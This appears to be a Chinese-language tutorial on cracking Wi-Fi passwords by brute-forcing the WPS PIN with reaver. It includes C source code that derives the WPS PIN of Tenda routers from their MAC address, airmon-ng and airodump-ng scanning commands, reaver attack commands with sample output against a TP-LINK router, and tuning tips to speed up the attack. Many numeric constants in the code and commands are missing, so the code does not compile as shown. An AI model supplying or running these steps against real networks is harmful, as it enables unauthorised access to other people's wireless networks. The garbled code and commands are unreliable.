wifi reaver

  PIN码的格式很简单， 八位十进制数，最后一位（第8位）为校验位(可根据前7位算出)，验证时先检测前4位，如果一致则反馈一个信息，所以只需1万次就可完全扫描一遍前4位，前4位确定下来的话，只需再试1000次（接下来的3位），校验位可通过前7为算出，就可暴力验证出pin码。所以即时你不知道校验位怎么计算，那你最多尝试10000++10次=11010次就可以获得PIN，从而获得wifi密码

不过使用PIN方法破解WPA-PSK密码有一个限制，就是AP必须开启了QSS、WPS功能！我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能，如下图使用airodump-ng扫描时候在MB栏中后面有个“.”的就是。

由于PIN是随机生成的一个8位10进制数。所以这是由各路由厂商生成的。腾达（Tenda）部分路由（C83A35，00B00C）是由MAC的前6位16进制数直接转化为7位10进制数外加一个检验码生成，算法弱爆了。所以可以直接通过Dec2Hex计算出来。  而像DLink对PIN错会有延迟，这样会导致PIN速度很慢，间接起到防PIN的作用，还有很多其他的，针对不同的路由可以去网上找相关资料。而有一些TPLink是直接带有防PIN功能的。当然这都是需要时间的，所以要有耐心。

“C83A35”或“00B00C”打头路由PIN计算工具源码，大家可以自己编译：

    //Computes PIN code starts with OUI "C83A35" and "00B00C"

    //Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.
    //Coded by Zhaochunsheng - iBeini.com
    //Modified by Lingxi - WiFiBETA.COM

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdafx.h>

    int main()
    {

        unsigned int wps_pin_checksum(unsigned int pin);
        int PIN = ;

     //   printf("ComputePIN-C83A35\n");
        printf("Description:\n");
        printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");
        printf("type the other six digits, you might be able to get the \n");
        printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
        printf("Code by ZhaoChunsheng 04/07/2012 http://www.2cto.com \n\n");

        printf("Modified by Lingxi - WiFiBETA.COM\n\n");
    //Translated to Chinese
     printf("说明：\n");
     printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头，\n");
     printf("输入后六位MAC地址（不分大小写）您或许可以获得该路由的WPS PIN密钥！\n");
     printf("祝你好运！\n\n");
     printf("由赵春生编写于2012年4月7日  Http://iBeini.com\n");
     printf("由灵曦修改并汉化  WiFiBETA.COM\n\n");
     printf("请输入后六位MAC地址（HEX）：\n");
     printf("Input the last 6 digits of MAC Address(HEX):");
     scanf("%x",&PIN);  printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);
     printf("WPS PIN is: %07d%d\n",PIN%,wps_pin_checksum(PIN%));

        return ;
    }

    unsigned int wps_pin_checksum(unsigned int pin)
    {
    unsigned int accum = ;
    while (pin)
    {
    accum +=  * (pin % );
    pin /= ;
    accum += pin % ;
    pin /= ;
    }

        return ( - accum % ) % ;
    }

在已知PIN码的情况下,使用 直接秒破

reaver -i mon0 -b   Mac  -p pin

使用 aircrack，寻找附近开启wps的路由器

airmon-ng start wlan0
airodump-ng mon0
ifconfig wlan0 down

使用reaver 破解开启wps功能的路由器密码

reaver在此过程中还会保存进度（/usr/local/etc/reaver/APs MAC.wpc）到文件。

reaver -i mon0 -b MAC  -N -vv

reaver  -i  mon0  -b 8C::0A:5F:A2:FA  -a  -S  -vv  -d2  -t  -c 

Copyright (c) , Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel
[+] Waiting for beacon from 8C::0A:5F:A2:FA
[+] Associated with 8C::0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK

附上reaver调整参数的一些小技巧

reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key（可以提高PJ速度）
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 

(非TP-LINK路由推荐–d9 –t9参数防止路由僵死
    reaver -i mon0 -b MAC -a -S –d9 –t9 -vv）
应因状况调整参数（-c后面都以目标频道为1作为例子）
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t  -c
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 

参考链接： http://www.2cto.com/Article/201204/129296.html

.